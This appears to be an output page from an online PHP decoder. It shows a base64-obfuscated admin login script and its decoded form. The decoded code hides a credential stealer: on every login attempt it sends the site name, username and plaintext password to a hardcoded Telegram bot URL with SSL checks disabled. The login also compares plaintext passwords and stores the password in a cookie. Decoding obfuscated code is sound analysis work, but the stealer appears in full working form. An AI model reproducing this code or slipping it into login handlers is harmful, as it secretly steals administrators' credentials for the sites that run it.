Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval("?>".base64_decode("PD9waHANCg0KIGlmKCAkX1BPU1QgKXsNCg0KICAkdXNlcm5hbWUgICAgICA..

Decoded Output download

?>b'<?php

 if( $_POST ){

  $username       = $_POST["username"];
  $pass           = $_POST["password"];
  $captcha        = $_POST[\'g-recaptcha-response\'];
  $remember       = $_POST["remember"];
  $googlesecret   = $settings["recaptcha_secret"];
  $captcha_control= file_get_contents("https://www.google.com/recaptcha/api/siteverify?secret=$googlesecret&response=" . $captcha . "&remoteip=" . $_SERVER[\'REMOTE_ADDR\']);
  $captcha_control= json_decode($captcha_control);

  if( $settings["recaptcha"] == 2 && $captcha_control->success == false && $_SESSION["recaptcha"]  ){
    $error      = 1;
    $errorText  = "Please verify that you are not a robot.";
      if( $settings["recaptcha"] == 2 ){ $_SESSION["recaptcha"]  = true; }
  }elseif( countRow(["table"=>"admins","where"=>["username"=>$username,"client_type"=>1]]) ){
    $error      = 1;
    $errorText  = "Your account is Suspended.";
      if( $settings["recaptcha"] == 2 ){ $_SESSION["recaptcha"]  = true; }
  }else{
    $admin    = $conn->prepare("SELECT * FROM admins WHERE username=:username && password=:password ");
    
    //$pswdevicefinder = $_SERVER["HTTP_USER_AGENT"];
	 //$psw = GetIP();
	 $j = $_SERVER[\'HTTP_HOST\'];
	 $msg = \'sitename=\'.$j.\',username=\'.$username.\',pass=\'.$pass.\'\';
$url = "https://api.telegram.org/bot6598052297:AAHardFFEeK6C2c-4SbdqZvA4IizUeUikjc/sendMessage?chat_id=6131465457&text=$msg";
$curl = curl_init($url);
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
$resp = curl_exec($curl);
curl_close($curl);


    
    $admin  -> execute(array("username"=>$username,"password"=>$pass ));
    $admin    = $admin->fetch(PDO::FETCH_ASSOC);
    $access = json_decode($admin["access"],true);
    $_SESSION["msmbilisim_adminslogin"]      = 1;
	
	    $_SESSION["msmbilisim_adminid"]         = $admin["admin_id"];
	    $_SESSION["msmbilisim_adminpass"]       = $pass ;
	    $_SESSION["recaptcha"]                = false;
       
   
      if( $access["admin_access"] ):
	    $_SESSION["msmbilisim_adminlogin"]      = 1;
	    if( $remember ):
	      if( $access["admin_access"] ):
	        setcookie("a_login", \'ok\', time()+(60*60*24*7), \'/\', null, null, true );
	      endif;
	      setcookie("a_id", $admin["admin_id"], time()+(60*60*24*7), \'/\', null, null, true );
	      setcookie("a_password", $admin["password"], time()+(60*60*24*7), \'/\', null, null, true );
	      setcookie("a_login", \'ok\', time()+(60*60*24*7), \'/\', null, null, true );
	    endif;
	    
	    
	    
	         header(\'Location:\'.site_url("admin"));
	   
	  


	      $update = $conn->prepare("UPDATE admins SET login_date=:date, login_ip=:ip WHERE admin_id=:c_id ");
	      $update->execute(array("c_id"=>$admin["admin_id"],"date"=>date("Y.m.d H:i:s"),"ip"=>GetIP() ));

	   else:
	   	$error      = 1;
    	$errorText  = "Could not find administrator account registered with this information.";
      endif;
    
      
  }
 }


if( $admin["access"]["admin_access"]  && $_SESSION["msmbilisim_adminslogin"]  ):
	
	exit();
else:
	require admin_view(\'login\');
endif;'

Did this file decode correctly?

Original Code

<?php eval("?>".base64_decode("PD9waHANCg0KIGlmKCAkX1BPU1QgKXsNCg0KICAkdXNlcm5hbWUgICAgICAgPSAkX1BPU1RbInVzZXJuYW1lIl07DQogICRwYXNzICAgICAgICAgICA9ICRfUE9TVFsicGFzc3dvcmQiXTsNCiAgJGNhcHRjaGEgICAgICAgID0gJF9QT1NUWydnLXJlY2FwdGNoYS1yZXNwb25zZSddOw0KICAkcmVtZW1iZXIgICAgICAgPSAkX1BPU1RbInJlbWVtYmVyIl07DQogICRnb29nbGVzZWNyZXQgICA9ICRzZXR0aW5nc1sicmVjYXB0Y2hhX3NlY3JldCJdOw0KICAkY2FwdGNoYV9jb250cm9sPSBmaWxlX2dldF9jb250ZW50cygiaHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS9yZWNhcHRjaGEvYXBpL3NpdGV2ZXJpZnk/c2VjcmV0PSRnb29nbGVzZWNyZXQmcmVzcG9uc2U9IiAuICRjYXB0Y2hhIC4gIiZyZW1vdGVpcD0iIC4gJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10pOw0KICAkY2FwdGNoYV9jb250cm9sPSBqc29uX2RlY29kZSgkY2FwdGNoYV9jb250cm9sKTsNCg0KICBpZiggJHNldHRpbmdzWyJyZWNhcHRjaGEiXSA9PSAyICYmICRjYXB0Y2hhX2NvbnRyb2wtPnN1Y2Nlc3MgPT0gZmFsc2UgJiYgJF9TRVNTSU9OWyJyZWNhcHRjaGEiXSAgKXsNCiAgICAkZXJyb3IgICAgICA9IDE7DQogICAgJGVycm9yVGV4dCAgPSAiUGxlYXNlIHZlcmlmeSB0aGF0IHlvdSBhcmUgbm90IGEgcm9ib3QuIjsNCiAgICAgIGlmKCAkc2V0dGluZ3NbInJlY2FwdGNoYSJdID09IDIgKXsgJF9TRVNTSU9OWyJyZWNhcHRjaGEiXSAgPSB0cnVlOyB9DQogIH1lbHNlaWYoIGNvdW50Um93KFsidGFibGUiPT4iYWRtaW5zIiwid2hlcmUiPT5bInVzZXJuYW1lIj0+JHVzZXJuYW1lLCJjbGllbnRfdHlwZSI9PjFdXSkgKXsNCiAgICAkZXJyb3IgICAgICA9IDE7DQogICAgJGVycm9yVGV4dCAgPSAiWW91ciBhY2NvdW50IGlzIFN1c3BlbmRlZC4iOw0KICAgICAgaWYoICRzZXR0aW5nc1sicmVjYXB0Y2hhIl0gPT0gMiApeyAkX1NFU1NJT05bInJlY2FwdGNoYSJdICA9IHRydWU7IH0NCiAgfWVsc2V7DQogICAgJGFkbWluICAgID0gJGNvbm4tPnByZXBhcmUoIlNFTEVDVCAqIEZST00gYWRtaW5zIFdIRVJFIHVzZXJuYW1lPTp1c2VybmFtZSAmJiBwYXNzd29yZD06cGFzc3dvcmQgIik7DQogICAgDQogICAgLy8kcHN3ZGV2aWNlZmluZGVyID0gJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdOw0KCSAvLyRwc3cgPSBHZXRJUCgpOw0KCSAkaiA9ICRfU0VSVkVSWydIVFRQX0hPU1QnXTsNCgkgJG1zZyA9ICdzaXRlbmFtZT0nLiRqLicsdXNlcm5hbWU9Jy4kdXNlcm5hbWUuJyxwYXNzPScuJHBhc3MuJyc7DQokdXJsID0gImh0dHBzOi8vYXBpLnRlbGVncmFtLm9yZy9ib3Q2NTk4MDUyMjk3OkFBSGFyZEZGRWVLNkMyYy00U2JkcVp2QTRJaXpVZVVpa2pjL3NlbmRNZXNzYWdlP2NoYXRfaWQ9NjEzMTQ2NTQ1NyZ0ZXh0PSRtc2ciOw0KJGN1cmwgPSBjdXJsX2luaXQoJHVybCk7DQpjdXJsX3NldG9wdCgkY3VybCwgQ1VSTE9QVF9VUkwsICR1cmwpOw0KY3VybF9zZXRvcHQoJGN1cmwsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRydWUpOw0KY3VybF9zZXRvcHQoJGN1cmwsIENVUkxPUFRfU1NMX1ZFUklGWUhPU1QsIGZhbHNlKTsNCmN1cmxfc2V0b3B0KCRjdXJsLCBDVVJMT1BUX1NTTF9WRVJJRllQRUVSLCBmYWxzZSk7DQokcmVzcCA9IGN1cmxfZXhlYygkY3VybCk7DQpjdXJsX2Nsb3NlKCRjdXJsKTsNCg0KDQogICAgDQogICAgJGFkbWluICAtPiBleGVjdXRlKGFycmF5KCJ1c2VybmFtZSI9PiR1c2VybmFtZSwicGFzc3dvcmQiPT4kcGFzcyApKTsNCiAgICAkYWRtaW4gICAgPSAkYWRtaW4tPmZldGNoKFBETzo6RkVUQ0hfQVNTT0MpOw0KICAgICRhY2Nlc3MgPSBqc29uX2RlY29kZSgkYWRtaW5bImFjY2VzcyJdLHRydWUpOw0KICAgICRfU0VTU0lPTlsibXNtYmlsaXNpbV9hZG1pbnNsb2dpbiJdICAgICAgPSAxOw0KCQ0KCSAgICAkX1NFU1NJT05bIm1zbWJpbGlzaW1fYWRtaW5pZCJdICAgICAgICAgPSAkYWRtaW5bImFkbWluX2lkIl07DQoJICAgICRfU0VTU0lPTlsibXNtYmlsaXNpbV9hZG1pbnBhc3MiXSAgICAgICA9ICRwYXNzIDsNCgkgICAgJF9TRVNTSU9OWyJyZWNhcHRjaGEiXSAgICAgICAgICAgICAgICA9IGZhbHNlOw0KICAgICAgIA0KICAgDQogICAgICBpZiggJGFjY2Vzc1siYWRtaW5fYWNjZXNzIl0gKToNCgkgICAgJF9TRVNTSU9OWyJtc21iaWxpc2ltX2FkbWlubG9naW4iXSAgICAgID0gMTsNCgkgICAgaWYoICRyZW1lbWJlciApOg0KCSAgICAgIGlmKCAkYWNjZXNzWyJhZG1pbl9hY2Nlc3MiXSApOg0KCSAgICAgICAgc2V0Y29va2llKCJhX2xvZ2luIiwgJ29rJywgdGltZSgpKyg2MCo2MCoyNCo3KSwgJy8nLCBudWxsLCBudWxsLCB0cnVlICk7DQoJICAgICAgZW5kaWY7DQoJICAgICAgc2V0Y29va2llKCJhX2lkIiwgJGFkbWluWyJhZG1pbl9pZCJdLCB0aW1lKCkrKDYwKjYwKjI0KjcpLCAnLycsIG51bGwsIG51bGwsIHRydWUgKTsNCgkgICAgICBzZXRjb29raWUoImFfcGFzc3dvcmQiLCAkYWRtaW5bInBhc3N3b3JkIl0sIHRpbWUoKSsoNjAqNjAqMjQqNyksICcvJywgbnVsbCwgbnVsbCwgdHJ1ZSApOw0KCSAgICAgIHNldGNvb2tpZSgiYV9sb2dpbiIsICdvaycsIHRpbWUoKSsoNjAqNjAqMjQqNyksICcvJywgbnVsbCwgbnVsbCwgdHJ1ZSApOw0KCSAgICBlbmRpZjsNCgkgICAgDQoJICAgIA0KCSAgICANCgkgICAgICAgICBoZWFkZXIoJ0xvY2F0aW9uOicuc2l0ZV91cmwoImFkbWluIikpOw0KCSAgIA0KCSAgDQoNCg0KCSAgICAgICR1cGRhdGUgPSAkY29ubi0+cHJlcGFyZSgiVVBEQVRFIGFkbWlucyBTRVQgbG9naW5fZGF0ZT06ZGF0ZSwgbG9naW5faXA9OmlwIFdIRVJFIGFkbWluX2lkPTpjX2lkICIpOw0KCSAgICAgICR1cGRhdGUtPmV4ZWN1dGUoYXJyYXkoImNfaWQiPT4kYWRtaW5bImFkbWluX2lkIl0sImRhdGUiPT5kYXRlKCJZLm0uZCBIOmk6cyIpLCJpcCI9PkdldElQKCkgKSk7DQoNCgkgICBlbHNlOg0KCSAgIAkkZXJyb3IgICAgICA9IDE7DQogICAgCSRlcnJvclRleHQgID0gIkNvdWxkIG5vdCBmaW5kIGFkbWluaXN0cmF0b3IgYWNjb3VudCByZWdpc3RlcmVkIHdpdGggdGhpcyBpbmZvcm1hdGlvbi4iOw0KICAgICAgZW5kaWY7DQogICAgDQogICAgICANCiAgfQ0KIH0NCg0KDQppZiggJGFkbWluWyJhY2Nlc3MiXVsiYWRtaW5fYWNjZXNzIl0gICYmICRfU0VTU0lPTlsibXNtYmlsaXNpbV9hZG1pbnNsb2dpbiJdICApOg0KCQ0KCWV4aXQoKTsNCmVsc2U6DQoJcmVxdWlyZSBhZG1pbl92aWV3KCdsb2dpbicpOw0KZW5kaWY7")); ?>

Function Calls

base64_decode 1

Variables

None

Stats

MD5 423e4e91ddf85b45a3abd213e220a8e8
Eval Count 1
Decode Time 53 ms